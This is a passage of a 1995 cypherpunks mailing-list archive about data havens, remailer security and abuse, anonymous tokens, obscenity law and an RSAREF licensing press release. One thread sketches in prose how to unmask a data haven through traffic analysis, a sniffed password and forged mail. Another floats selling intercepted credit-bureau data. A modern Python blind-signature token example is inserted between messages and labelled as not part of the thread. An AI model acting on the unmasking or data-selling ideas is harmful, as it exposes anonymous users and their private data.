Public discussion is of course just that, and it's ridiculous to attempt to prevent it being put to use for purposes not originally intended. The remedy to an invasion is to build walls; when the invasion is one of privacy, the walls are technological. Some pioneers are already protecting themselves through the use of encryption, digital signatures, and multiple pseudonyms - making it impossible for profilers to associate opinions with real people.

In a way, the Invasion Of The Profilers is a good thing - it will make individuals realize what little privacy they have, and teach them the value of privacy. Not everyone will want to seal themselves in private cocoons.
Most will not object to some loss of privacy, but in exchange for a (not necessarily monetary) share of the profilers' profits. Individuals will control their privacy and selectively reduce it when it benefits themselves.

A particularly useful application of this is in an electronic public library. Once access to data is severely restricted to protect intellectual property rights, the Internet as a source of knowledge for everyone will die, unless libraries are opened to provide information free of cost. Such libraries need not survive on subsidies; rather, they can ask for a copy of any information base in cyberspace from all publishers. By limiting access to individuals who are willing to give up some privacy, the library and publishers will benefit from the sale of users' access records to advertisers. Advertisers will be delighted, as most other inputs for profiling in a privacy-aware society will be unavailable. Finally, users will get free access to information if they so choose, at a cost that they can agree to.

While one can be frightened by the ease with which a multitude of Big Brothers can monitor the citizens of cyberspace, technology, as always, has something for everyone. As it becomes easier to search through electronic communications, it also becomes easier to protect privacy to varying degrees. Individuals will be forced to be aware of risks to their privacy. With the opening of markets for profiles, privacy may finally find a concrete value.

Rishab Aiyer Ghosh is a freelance technology consultant and writer. You can reach him through voice mail (+91 11 3760335) or e-mail (rishab at dxm.ernet.in).

--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
This article may be redistributed in electronic form only, PROVIDED THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT.
This article MAY NOT UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form, or redistributed in any form for compensation of any kind, WITHOUT PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab at dxm.ernet.in)
--==================================================================--

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh "In between the breaths is
rishab at dxm.ernet.in the space where we live"
rishab at arbornet.org - Lawrence Durrell
Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA

From nesta at nesta.pr.mcs.net Mon Jan 9 18:58:04 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Mon, 9 Jan 95 18:58:04 PST
Subject: Experiments and Toys vs. the Real Thing
In-Reply-To: <199501091946.LAA06410@netcom18.netcom.com>
Message-ID:

On Mon, 9 Jan 1995, Timothy C. May wrote:

I was one who wrote a post saying that a data haven should support all files, including porno and such things, and that filtering would be bad karma. I was under the assumption then that we were talking about fully operational, well established Data-havens, as in I thought we were speaking mostly hypothetically. I agree with Tim when it comes to the experimental stage of a project.

> Digital cash is more clearly still at the experimental level, as are anonymous markets (like BlackNet), data havens, and so forth.

I would like it if the person who is working on the datahaven code would give us some more information, like what it does, what are the plans for it etc.. DataHaven is a vague word. Blacknet is going on right now, only none of us are involved in it, not to say I'm so k-rad and kool that I am underground and involved in it, but the anonymous market is alive today, JUST that it isn't being studied, like one such as BlackNet conceivably would have been. There are definitely people making anon. transactions out there.
> The recent claims that nascent "data havens" _must_ support all files, including hard-core porn, weapons secrets, etc. seems to be an example of this. I'm not for censorship, just concerned that the data haven _experiments_ are not secure enough, not robust enough, to actually carry high-visibility files.

I was referring to the finished, established project, and not the experiment/study level.

> (And let's not forget "snatch teams" that grab foreign nationals suspected of crimes...Israel, Iraq, Iran, and the U.S. have grabbed people in other countries. And more common is simple execution. If a Swedish data haven carried files related to U.S. operations, and the data haven location was known--part of what I mean by saying the enabling technologies do not yet exist--then various measures would be applied. Diplomatic, equipment sabotage, even killing the operators. I'm not being Ludlumesque here...clearly such "threats to national security" would be seen as justifying various reactions. Especially to send a message to other potential operators.)

Sterling's _Islands In The Net_ is a must read for this topic matter. In this book, the DataHaven operators maintain security thru the data they hoard, by holding it over people's heads, and also by just plain technical savvy (ala action thrillers hehe)

> --Tim May, who thinks the first real data havens will come under intense attack and so had better be secure from the start

I would like to help get them off the ground, by either providing help with code, policy, or just another head in the game.
They are a techno fetish of mine, I mean I'm even nymed after one, Nesta Stubbs, from _Islands In The Net_

From remailer-admin at ideath.goldenbear.com Mon Jan 9 19:07:00 1995
From: remailer-admin at ideath.goldenbear.com (Anonymous User)
Date: Mon, 9 Jan 95 19:07:00 PST
Subject: No Subject
Message-ID: <199501100222.AA15620@ideath.goldenbear.com>

Pierre Uszynski writes:
> Significant abuse is that which causes significant problems for the operators: posting secret religious technology, forging prime minister mail, harassing a member of any number of opposite persuasions, etc...

on that note, check out this excerpt from the remailer-help file of the q at c2.org remailer:

> Abuse/Self-Preservation Policy:
> Abuse of the Q Mixmaster Remailer consists in those uses of the remailer which endanger its continued operation. Please don't ruin anonymity services for those people with legitimate needs for them.

From nesta at nesta.pr.mcs.net Mon Jan 9 19:09:47 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Mon, 9 Jan 95 19:09:47 PST
Subject: Data Haven problems
In-Reply-To: <199501100125.TAA29250@pentagon.io.com>
Message-ID:

On Mon, 9 Jan 1995 dfloyd at io.com wrote:

> My problem is not that people will bitch about my DH. My problem will be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then making a long report how I cater to p*dofiles and other evil denizens that pop from time to time. Then, I get the police knocking at my door, asking me to come to Club Fed for a looooonnnggg vacation.

I myself see nothing wrong with selectively choosing your users at this juncture. With an experimental server that wouldn't have the back-up to protect itself from attacks in real-space (police feds guns dogs fundies) you DO need to be careful. If you wanna turn this into a profit thing (which is possible) you then would get to choose your clients.
I guess what I meant to say in that last letter, was directed towards a full-fledged, well established and backed DataHaven that was not run for profit, but rather as a service to help the public (yeah, I know this list's idea on those projects, I won't go that direction no more) and thus would need to be open like that.

> Of course, the DH will be hidden by a good remailer (anon.penet.fi), but it is trivial to use traffic analysis to find where the DH lies. Just monitor traffic from/to the remailer and do a series of store/retrieves. Then for confirmation, forge a mail from the dh site to the remailer with the password (obtained from sniffing) to yourself.

Well for an experiment that is fine, and I don't see it then much more than a listserv file service with encryption, unless I am missing something in the DataHaven you have planned. But later on when you wanna get serious and shit, you could get better shielding than that, depending on how much money you wanna spend. Everything from offshore sites with satellite feeds or radio feeds (encrypted of course) with physical security measures and such.

> This is the main reason I haven't worked on this code for so long, as well as finals and other distractions. Until I find a decent solution to this problem (The alpha test will be a snap... just allow certain people to send/get and ban all others, but once in full working mode this ceases to be a solution.) I am hesitant on setting up a working DH.

I would set one up if I had the code that met my standards (I don't have time right now to write it myself, but maybe if this thread goes well I will be inspired enough to order a few pizzas and go for it). Right now my connection is much, much too slow to allow such traffic. This is something I have been doing some serious thinking about also.
I can actually see it being possible for me to have a small scale experimental data haven up and running in the near future, acting not only as a drop box, but also as a storage place and database of obscure information.

From nesta at nesta.pr.mcs.net Mon Jan 9 19:13:27 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Mon, 9 Jan 95 19:13:27 PST
Subject: Pornography, What is it?
In-Reply-To: <199501100141.TAA00216@einstein.ssz.com>
Message-ID:

On Mon, 9 Jan 1995, root wrote:

> From: ravage at bga.com
> To: cpunks the world over
>
> Hi all,
>
> I am very interested in the data haven issue now that I have my site up. The aspect of pornography is a problem that has to be faced. To this end, I would like to ask that we look at how pornography is defined.

What you define as pornography doesn't mean shit, it's what the media and journalists and fundies etc.. decide is pornographic that you gotta watch out for. This means just about anything that isn't vanilla After School Special material is suspect.

I too may have a site in the near future, so I am interested in the project also, as I have always been really into the idea of data-havens. I think that a self-sufficient data-haven is going to need a lot of resources tho to continue it's operation past the point where it is known to exist.

i want to know everything http://www.mcs.com/~nesta/home.html
i want to be everywhere Nesta's Home Page
i want to fuck everyone in the world &
i want to do something that matters /-/ a s t e zine

From pstemari at erinet.com Mon Jan 9 19:30:14 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Mon, 9 Jan 95 19:30:14 PST
Subject: Data Haven problems
Message-ID: <9501100322.AB12220@eri.erinet.com>

At 07:25 PM 1/9/95, dfloyd at io.com wrote:
> ... Of course, the DH will be hidden by a good remailer (anon.penet.fi), but it is trivial to use traffic analysis to find where the DH lies. Just monitor traffic from/to the remailer and do a series of store/retrieves.
> Then for confirmation, forge a mail from the dh site to the remailer with the password (obtained from sniffing) to yourself. ...

Hmm, hmm. Using c'punk remailers with encrypted send blocks fixes one problem, especially if the c'punk mailers do some sort of file splitting and reassembly along the lines of what happens to IP packets that are too large for a given link. What would also help would be a mechanism for randomly varying the encrypted send-to block. The password replay attacks can be fixed by encrypting the transmitted password along with a timestamp/sequence number.

One problem that remains would be a trail left by the increased traffic to/from a DH vs a normal user. That could only be fixed by a multitude of DH sites.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From rockwell at nova.umd.edu Mon Jan 9 20:07:07 1995
From: rockwell at nova.umd.edu (Raul Deluth Miller)
Date: Mon, 9 Jan 95 20:07:07 PST
Subject: Pornography, What is it?
Message-ID: <199501100406.XAA14238@nova.umd.edu>

Pornography is in the eyes of the beholder.

[Especially if the beholder happens to be a postmaster in Memphis...]

--
Raul D. Miller N=:((*/pq)&|)@ NB. public e, y, n=:*/pq P=:*N/@:# NB. */-.,e e.&factors t=:*/<:pq 1=t|e*d NB. prim=:1&=@| 2&^@<: [. large=:>&(2^1024) x-:d P,:y=:e P,:x NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d

From root at einstein.ssz.com Mon Jan 9 20:36:44 1995
From: root at einstein.ssz.com (root)
Date: Mon, 9 Jan 95 20:36:44 PST
Subject: Pornography, What is it?
In-Reply-To:
Message-ID: <199501100432.WAA00738@einstein.ssz.com>

> > I am very interested in the data haven issue now that I have my site up. The aspect of pornography is a problem that has to be faced. To this end, I would like to ask that we look at how pornography is defined.
>
> What you define as pornography doesn't mean shit, it's what the media and journalists and fundies etc.. decide is pornographic that you gotta watch out for.
> This means just about anything that isn't vanilla After School Special material is suspect.

I am well aware that what I personally consider pornography carries little weight. But it does carry some since I do vote. There is the whole issue of community standard that has been left out of this discussion so far and that means that I as a taxed land owner (5 acres in Lockhard, TX) get to sit on juries now and again. In that sense what I believe can carry a lot of weight. Even to the point of refusing to convict somebody because I personally feel a law or precedence is incorrect. But when you consider states like Oregon where the whole concept of pornography has been removed from the books it makes me have a little hope for sanity. My personal contention is that pornography does not exist any more than good or evil do, these concepts are based on our personal ethos not anything absolute.

> I too may have a site in the near future, so I am interested in the project also, as I have always been really into the idea of data-havens. I think that a self-sufficient data-haven is going to need a lot of resources tho to continue it's operation past the point where it is known to exist.

As to data havens being dangerous to run...I don't know. At the recent HoHoCon there was a long discussion 'bout networks hidden within networks that was very intriguing. If Doug Barnes is reading this he may be willing to reiterate some of the talk. I do know that at the moment my partners and myself are looking at remailer software running under Linux and data havens are something that we have discussed. I personally see data havens as a repository for information that is beyond the ken of governments to regulate. This is the key point to me. Not whether it is industrial secrets, military secrets, or .gif's that jr. can get his rocks off over.
I see the whole pornography issue as a red herring that keeps the dim-witted and ignorant busy on while everyone else with a clue gets on with their own personal agenda. I do not mean this to imply a conspiracy, simply that most DA's have something they want (ie political clout) and they will in general do whatever it takes to get. In a sense one could consider such regulatory agencies as mercenaries for personal gain.

> i want to know everything http://www.mcs.com/~nesta/home.html
> i want to be everywhere Nesta's Home Page
> i want to fuck everyone in the world &
> i want to do something that matters /-/ a s t e zine

From nesta at nesta.pr.mcs.net Mon Jan 9 21:07:46 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Mon, 9 Jan 95 21:07:46 PST
Subject: Pornography, What is it?
In-Reply-To: <199501100432.WAA00738@einstein.ssz.com>
Message-ID:

On Mon, 9 Jan 1995, root wrote:

> As to data havens being dangerous to run...I don't know. At the recent HoHoCon there was a long discussion 'bout networks hidden within networks that was very intriguing. If Doug Barnes is reading this he may be willing to reiterate some of the talk. I do know that at the moment my partners and myself are looking at remailer software running under Linux and data havens are something that we have discussed. I personally see data havens as a repository for information that is beyond the ken of governments to regulate. This is the key point to me. Not whether it is industrial secrets, military secrets, or .gif's that jr. can get his rocks off over.

This is something I have been doing some writing on lately, the idea of nets on top of nets, the almost fractal nature of networking of this scale and horizontal nature on the Internet.
A DataHaven, like I mentioned in another post, is a vague name, it could be some hacker kid with a lot of space on his HD and a fast modem who hacks the local university and installs term, rigging his term connection to allow FTP connections, or telnet connections, or it could be someone with a decent sized investor backing him up as he gets a site linked to the net from some Caribbean Island, who collects and intercepts TRW and Equifax like data on credit transactions and shit like that, selling it to those about to invest in someone or something and want more info on it. OR maybe it's an elaborate set-up of mail aliases thru remailer chains and clearing stations that lead to data safe deposit boxes, where someone can leave a large amount of data anon, and then allow someone else to retrieve it anon also. With sufficient planning, coding and equipment a datahaven could perform almost all the ideas that Tim came up with in his cyphernomicon, from selling credit info, to a data drop box, to a holding agent for anon transactions (can't remember proper term).

damn I wish I could have made it to HoHoCon.

From lmccarth at ducie.cs.umass.edu Mon Jan 9 22:54:30 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 9 Jan 95 22:54:30 PST
Subject: Anonymous videoconferencing applications
Message-ID: <199501100644.BAA23178@bb.hks.net>

Alan Bostick writes:
> I thought so too, at first; but then I thought of this obvious application:

[lurid details omitted ;]

"Ever seen your children bound and blindfolded from across the globe ? You will...."

> Whether technology is going to be developed for the convenience of kidnappers and terrorists is an open question.

I'd answer, "Undoubtedly," but I wonder just how readily available such technology would be to, uh, the rest of us.

> But there is clearly at least this one clear use for anonymous video conferencing.
Perhaps headhunters would find it handy for anonymous job interviews with candidates who prefer to remain nameless, but not jobless....

-L. Futplex McCarthy

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From jpb at gate.net Mon Jan 9 22:54:53 1995
From: jpb at gate.net (jpb at gate.net)
Date: Mon, 9 Jan 95 22:54:53 PST
Subject: Thoughts on Data Havens
In-Reply-To: <9501100322.AB12220@eri.erinet.com>
Message-ID: <199501100630.BAA10057@hopi.gate.net>

Re:
> At 07:25 PM 1/9/95, dfloyd at io.com wrote:
> > ... Of course, the DH will be hidden by a good remailer (anon.penet.fi), but it is trivial to use traffic analysis to find where the DH lies. Just monitor traffic from/to the remailer and do a series of store/retrieves. Then for confirmation, forge a mail from the dh site to the remailer with the password (obtained from sniffing) to yourself. ...

This is a known weakness of the wizvax style remailers. It is a shame that they are so easy for naive users to use - while I like the idea of an easy to use remailer, I have to shudder at how many people think that they are a secure system, especially when the reason they use them is usually because of a very real fear of the possible consequences if their lifestyle becomes public.

> Hmm, hmm.
> Using c'punk remailers with encrypted send blocks fixes one problem, especially if the c'punk mailers do some sort of file splitting and reassembly along the lines of what happens to IP packets that are too large for a given link. What would also help would be a mechanism for randomly varying the encrypted send-to block. The password replay attacks can be fixed by encrypting the transmitted password along with a timestamp/sequence number.

Post a new PGP key and encrypted address block weekly to alt.data.havens, alt.2600, or a stegoed picture to alt.binaries.pictures.whatever. If you are limiting usership, perhaps an autoencrypting majordomo list.

If you do decide to go the steganography route, keep in mind that users on other platforms will want to use your DH and pick your stego program accordingly. As a Mac user, few things irritate me as much as arj and zip files on ftp sites. gzip is a pain also, but at least I can un-gzip in my shell account before downloading.

> One problem that remains would be a trail left by the increased traffic to/from a DH vs a normal user. That could only be fixed by a multitude of DH sites.

One way of solving the traffic analysis problem is to have the DH account also act as a remailer. It would also be a good idea to only allow DH commands to be executed if the encrypted (mandatory) control message arrived from another remailer account - people knowledgeable enough to be using a dh will probably not mind if they are "forced" to route traffic through the remailer network - anyone paranoid enough to be a client is going to tack your address block on the end of a long chain they created themselves.

As an added security measure, when a valid control message is received, an identical length stream of random garbage should then be encrypted and passed into the remailer pool. This would be easier if remailers supported some sort of bit sink command to trash a message rather than pass it along.
Joe Block

No man's life, liberty or property are safe while the legislature is in session.

From lmccarth at ducie.cs.umass.edu Mon Jan 9 22:55:04 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 9 Jan 95 22:55:04 PST
Subject: DH Traffic Volume Analysis
Message-ID: <199501100612.BAA22933@bb.hks.net>

Paul J. Ste. Marie writes:
> One problem that remains would be a trail left by the increased traffic to/from a DH vs a normal user. That could only be fixed by a multitude of DH sites.

Ubiquitous remailing -- having a significant portion of the net population bouncing around randomly fluctuating encrypted traffic as background noise -- should help to cover both remailers and data havens. It would be nice to have more people firing off occasional encrypted stuff to muddy the waters. (Picture yourself in Bridge over the River Kwai if it helps ;)

-L. Futplex McCarthy; PGP key by finger or server

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
From hfinney at shell.portal.com Mon Jan 9 23:02:20 1995
From: hfinney at shell.portal.com (Hal)
Date: Mon, 9 Jan 95 23:02:20 PST
Subject: for-pay remailers and FV
Message-ID: <199501100701.XAA15283@jobe.shell.portal.com>

From: Pierre Uszynski
> Finally, I do not believe that introducing payment in the remailer system would curb abuse in any significant way. Significant abuse is that which causes significant problems for the operators: posting secret religious technology, forging prime minister mail, harassing a member of any number of opposite persuasions, etc... Do you think for a minute that a 5 cents postage is going to stop these messages now? And how about when remailers do attain good reliability and untraceability, for 3 cents?

I had suggested an idea a while back where you would try to address the abuse issue directly rather than charging per message. I agree with Pierre that any reasonable per-message charge will not help in many forms of abuse, although it should address the worst spam attacks.

The idea is to have a sort of digital cash token, but it is free. The key is that each person just gets one of these, but they are reusable. After a remailer sends a message, it waits and sees if it gets any complaints. If not, the token is re-blinded and made available to the original user via some kind of pool. He can then send another message. But if he commits abuse, he doesn't get his token back.

Obviously there are problems with this, the worst probably being how we can keep people from acquiring lots of tokens under different names. Perhaps you could charge some small amount for them, but require VISA payment, and check the names on the VISA cards.
(This doesn't hurt anonymity when the tokens are actually used because of the blinding.) To get multiple tokens a person would have to commit some serious real world name trickery, a considerably higher barrier than making up a pseudonym on the net. Another problem is that as stated above, you could only send one anonymous message every day or two. Perhaps we relax the rules and let people have a few of these tokens; they can then abuse the system a few times but each time they lose a token. A similar idea might work for the data haven problem, although I don't understand exactly what is intended there. This approach is a variation on the "is a person" credential, which attempts to make sure that each person only gets one of something. A lot of situations would benefit from such a credential, although some people don't like them. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLxIw2RnMLJtOy9MBAQGWCgH6A1SFyzZDDhd/NVrMck5SAf3mS4IOl5On aJNFKUopZi4Fb7tqQfbFukDl/lF+clnBDBNh/yXAsFcABJaWaTUzZA== =pLOT -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Jan 9 23:31:44 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 9 Jan 95 23:31:44 PST Subject: Traffic generation Message-ID: <199501100736.CAA23603@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Joe Block writes: > As an added security measure, when a valid control message is received, > an identical length stream of random garbage should then be encrypted and > passed into the remailer pool. This would be easier if remailers supported > some sort of bit sink command to trash a message rather than pass it along. Lance Cottrell's Mixmaster software supports this -- just use Anon-To: null - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
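The reusable-token scheme from Hal's message above (one blinded token per person, returned through a pool only when no complaint arrives), as an added Python sketch that is not part of any message in this thread. It assumes a single hypothetical operator that both issues tokens and runs the remailer, that the sender hands over the blinded replacement together with each message, and a constructed toy RSA key; every name in it is illustrative.

```python
# Added example: reusable blinded tokens for a remailer (toy RSA blind signatures).
# The key is built from two small Mersenne primes so the run is deterministic;
# it is a constructed demo key and far too weak for real use.
import hashlib
import secrets
from math import gcd

P, Q = 2**127 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # operator's private signing exponent


def h(serial: bytes) -> int:
    """Map a token serial into Z_N (stand-in for a full-domain hash)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def blind(serial: bytes):
    """User side: hide h(serial) behind a random factor r before signing."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return (h(serial) * pow(r, E, N)) % N, r


def unblind(blind_sig: int, r: int) -> int:
    """User side: strip r, leaving an ordinary RSA signature on h(serial)."""
    return (blind_sig * pow(r, -1, N)) % N


def verify(serial: bytes, sig: int) -> bool:
    return pow(sig, E, N) == h(serial)


def pool_tag(blinded: int) -> str:
    """Public label under which a re-issued token waits in the pool."""
    return hashlib.sha256(str(blinded).encode()).hexdigest()[:16]


class Operator:
    """Hypothetical combined token issuer and remailer."""

    def __init__(self):
        self.issued_to = set()   # identities that already hold a token
        self.spent = set()       # serials seen at the remailer
        self.escrow = {}         # msg_id -> blinded replacement on hold
        self.pool = {}           # pool_tag -> blind signature for pickup

    def issue(self, identity: str, blinded: int) -> int:
        # The identity check (e.g. name on a card) is assumed to happen here.
        if identity in self.issued_to:
            raise PermissionError("one token per person")
        self.issued_to.add(identity)
        return pow(blinded, D, N)

    def remail(self, msg_id: str, serial: bytes, sig: int, blinded_next: int) -> bool:
        if serial in self.spent or not verify(serial, sig):
            return False                      # replayed or forged token
        self.spent.add(serial)
        self.escrow[msg_id] = blinded_next    # held during the complaint window
        return True

    def close_window(self, msg_id: str, complaint: bool):
        blinded_next = self.escrow.pop(msg_id)
        if complaint:
            return None                       # abuse: the token is not returned
        tag = pool_tag(blinded_next)
        self.pool[tag] = pow(blinded_next, D, N)
        return tag


def first_token(op: Operator, identity: str):
    """Obtain the initial token under a checked identity."""
    serial = secrets.token_bytes(16)
    blinded, r = blind(serial)
    return serial, unblind(op.issue(identity, blinded), r)


def send_once(op: Operator, token, msg_id: str, complaint: bool):
    """Spend `token` on one message; return the replacement token or None."""
    serial, sig = token
    next_serial = secrets.token_bytes(16)
    blinded_next, r = blind(next_serial)
    if not op.remail(msg_id, serial, sig, blinded_next):
        return None
    if op.close_window(msg_id, complaint) is None:
        return None
    blind_sig = op.pool[pool_tag(blinded_next)]   # anonymous pickup from the pool
    return next_serial, unblind(blind_sig, r)
```

The operator can tie a pool entry to the message that earned it, but because it only ever signs blinded values, it cannot tie the replacement token to that entry when the token is later spent.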
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxI43yoZzwIn1bdtAQFNJwGAyLeVNnXjphXZFF9tznd4BI09+e4ec3z7 XjLgNg3qtNoxUM44ZkW0xsME+ot5B4A/ =q5OQ -----END PGP SIGNATURE----- From mccoy at io.com Mon Jan 9 23:54:41 1995 From: mccoy at io.com (Jim McCoy) Date: Mon, 9 Jan 95 23:54:41 PST Subject: Pornography, What is it? In-Reply-To: <199501100432.WAA00738@einstein.ssz.com> Message-ID: <199501100754.BAA23939@pentagon.io.com> > From: root [...] > > What you define as pornography doesn't mean shit, it's what the media and > > journalists and fundies etc.. decide is pornographic that you gotta watch > > out for. [...] > > > I am well aware that what I personally consider pornography carries little > weight. One minor nit. Pornography is not illegal, obscenity is what is regulated. The difference between the two is the fine line upon which we tread. > As to data havens being dangerous to run...I don't know. At the recent > HoHoCon there was a long discussion 'bout networks hidden within networks > that was very intriguing. If Doug Barnes is reading this he may be > willing to reiterate some of the talk. I do know that at the moment my > partners and myself are looking at remailer software running under Linux > and data havens are something that we have discussed. That was my talk, and if I ever get around to it I will be putting my notes and design details for underground internetworking up on the web. These notes include the slides from the talk and the technical notes relating to this issue...
jim From ChristopherA at consensus.com Tue Jan 10 00:16:36 1995 From: ChristopherA at consensus.com (Christopher Allen) Date: Tue, 10 Jan 95 00:16:36 PST Subject: PRESS RELEASE - RSA Licenses Commercial Distribution Rights to RSAREF (long) Message-ID: -----BEGIN PRIVACY-ENHANCED MESSAGE----- Proc-Type: 4,MIC-CLEAR Content-Domain: RFC822 Date:
Mon, 09 Jan 1995 09:00:00 -0800 Subject: PRESS RELEASE - RSA Licenses Commercial Distribution Rights to RSAREF From: Christopher Allen Organization: Consensus Development Corporation, San Francisco, CA USA Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Text-Source: ftp://ftp.consensus.com/pub/consensus/pr/RSAREF-PR.txt X-HTML-Source: http://www.consensus.com:8300/RSAREF-PR.html Summary: RSA announces that it is licensing commercial distribution rights of its RSAREF software to Consensus Development, allowing for implementation of commercial Privacy Enhanced Mail (PEM) applications. Keywords: press release, consensus development corporation, rsa data security, rsaref, commercial license, support, marketing, maintenance, encryption, digital signature, source code, tool kit, PEM, privacy enhanced mail RSA Licenses Commercial Distribution Rights to RSAREF ===================================================== RSA announces that it is licensing commercial distribution rights of its RSAREF software to Consensus Development, allowing for implementation of commercial Privacy Enhanced Mail (PEM) applications. Press Release - ------------- REDWOOD SHORES, CALIFORNIA--JANUARY 9, 1995--RSA Data Security, Inc. and Consensus Development Corporation jointly announce today at the RSA Data Security Conference that Consensus Development is licensing the commercial distribution rights of RSAREF from RSA Data Security. RSAREF (pronounced "R.S.A. reff") is short for "RSA reference implementation" and is a cryptography source code toolkit designed to allow developers to create PEM (Privacy-Enhanced Mail) software and other encryption/authentication tools. Until now, RSAREF has been an unsupported RSA product approved for use only as part of freeware and not-for-profit software applications.
Consensus Development will now be able to market and license RSAREF to commercial software developers, and provide software support and future enhancements to the RSAREF source code library. This announcement is significant because it is the first program of its kind to make the RSAREF implementation of RSA's popular patented authentication technology available to commercial vendors. "Data mailed, posted, or put on servers on the Internet is inherently untrustable today," said Jim Bidzos, president of RSA. "Tampering with electronic documents takes no special skills, and leaves no trace. With the availability of RSAREF for both free software as well as commercial software there is no need for this situation to continue." Now that a commercial license to RSAREF is available, applications may now be developed and sold that incorporate Privacy-Enhanced Mail's authentication and encryption capabilities. Christopher Allen, President of Consensus Development adds "The PEM standards have been under development for a couple of years and only now are coming to fruition. The ability to offer both freeware developers and commercial software vendors a license to RSAREF will kickstart the adoption of PEM-capable mail software." Consensus Development will be creating an email discussion list for software developers interested in RSAREF. To join the discussion, send a message to with the body of the message requesting "subscribe RSAREF-DEV-L firstname lastname". Background - ---------- The RSA cryptosystem was invented and patented in the late 1970's by Drs. Rivest, Shamir, and Adleman, at the Massachusetts Institute of Technology, who started RSA Data Security in Redwood City, California, in 1982. Digital signatures are produced using the RSA Cryptosystem, which is a public-key cryptosystem. Each user has two keys - one public and one private. The public key can be disclosed without compromising the private key.
Electronic documents can be "signed" with an unforgeable signature by using a document/private-key combination to produce a signature unique to the author and particular document. Anyone using an application that supports RSAREF and has the public key of the author can subsequently verify the authenticity of the document. Applications of digital signatures are endless: expense reports, electronic forms and purchase orders, contract revisions, engineering change orders, even tax returns can be electronically signed to speed electronic document flow and eliminate fraud. Furthermore, digital signatures can also be used to detect any virus before a program is executed, since any change whatsoever is detected. One reason that the paperless office has never materialized is that paper must still be printed so that handwritten signatures can be applied. RSAREF eliminates that necessity. Applications supporting RSAREF could have prevented last year's computer fraud at Dartmouth College, in which students were tricked into missing an important midterm by a fraudulent electronic mail message claiming to be from university faculty. Corporate Profiles - ------------------ RSA Data Security, Inc. is the acknowledged world leader in encryption technology, with over three million copies of its software encryption and authentication installed and in use worldwide. RSA is a de facto standard for encryption and digital signatures, and is part of existing and proposed standards for the Internet, CCITT, ISO, ANSI, IEEE and business and financial networks around the globe. RSA develops and markets platform-independent software developers' kits, end-user products, and provides comprehensive consulting services in the cryptographic sciences. RSA technology has been embedded in the products of many companies, including Microsoft, IBM, Apple, Oracle, General Magic, DEC, Sun, Novell, Lotus, Motorola, Northern Telecom, AT&T, WordPerfect, General Electric, Hughes Aircraft, and many others.
The company is headquartered in Redwood City, California. Consensus Development Corporation is a software development and consulting firm specializing in the support of organizations that need long-distance collaboration via wide-area networks and the Internet. Consensus Development has been offering consulting and software tools in the area of collaboration support since 1988 and is based in San Francisco, California. Clients include Aladdin Systems, American Information Exchange (AMIX), America Online, Apple Computer, Attain, Authorware, Berrett-Koehler Publishers, Claris Corporation, Component Integration Laboratories, Connectix Corporation, Digicash bv, Group Technologies, InterCon, ON Technology, Portfolio Systems, RSA Data Security, Ronin Publishing, Software Ventures, Visa International, and Xanadu Operating Company. Contact - ------- Kurt Stammberger RSA Data Security, Inc. 415/595-8782 Christopher Allen Consensus Development Corporation 415/647-6383 $$ - ------------------------------------------------------------------------ ...Christopher Allen Consensus Development Corporation.. ... 4104-24th Street #419.. ... San Francisco, CA 94114-3615.. ... o415/647-6383 f415/647-6384.. ...Mosaic/WWW Home Page: .. ...Consensus Home Page .. -----END PRIVACY-ENHANCED MESSAGE----- Created with RIPEM Mac 0.8.5 b1 From craig at passport.ca Tue Jan 10 00:49:55 1995 From: craig at passport.ca (Craig Hubley) Date: Tue, 10 Jan 95 00:49:55 PST Subject: Files and mail In-Reply-To: <199501070212.SAA19162@netcom3.netcom.com> Message-ID: > "I'm Wozz" writes: > > > Any professional knows better than to read private > > mail...and if this is so...then they aren't worthy of having > > a site to run > > For legal purposes, most BBS systems declare that for the > purposes of the ECPA, there is no such thing as private mail on > their system. The Sysop is then free to read anything he wishes > to.
This policy is clearly stated in the user agreements of > almost all BBS systems offering access to the public. This may be true of public access BBS systems, but on corporate sites the smart money pulls the other way. Smart corps avoid reading email for the same reason they avoid listening in on voice conversations (except in telemarketing etc.). Likelihood of a corporation being held liable for any abusive use of a system by an employee is drastically outweighed by the likelihood of a costly wrongful dismissal suit should any investigation of private correspondence reveal some private fact (e.g. they are gay, they are having an affair, etc.) that leads to their dismissal (and thus loss of access to the system!). In other words, abuse by managers of their supervisory privileges is far more likely to come back and haunt the organization than abuse by employees, in legal terms anyway. At a recent seminar on doing business on the internet I stated this opinion to an audience that included at least 20 lawyers. None disagreed, the numbers are clear enough. One added the qualification, which I agree with, that pirated software that the organization directly benefits from is a specific exception where the organization is guilty until proven innocent. But he hastened to add that the rest of the argument stood up. We agreed that a 'software audit' program such as the SPA 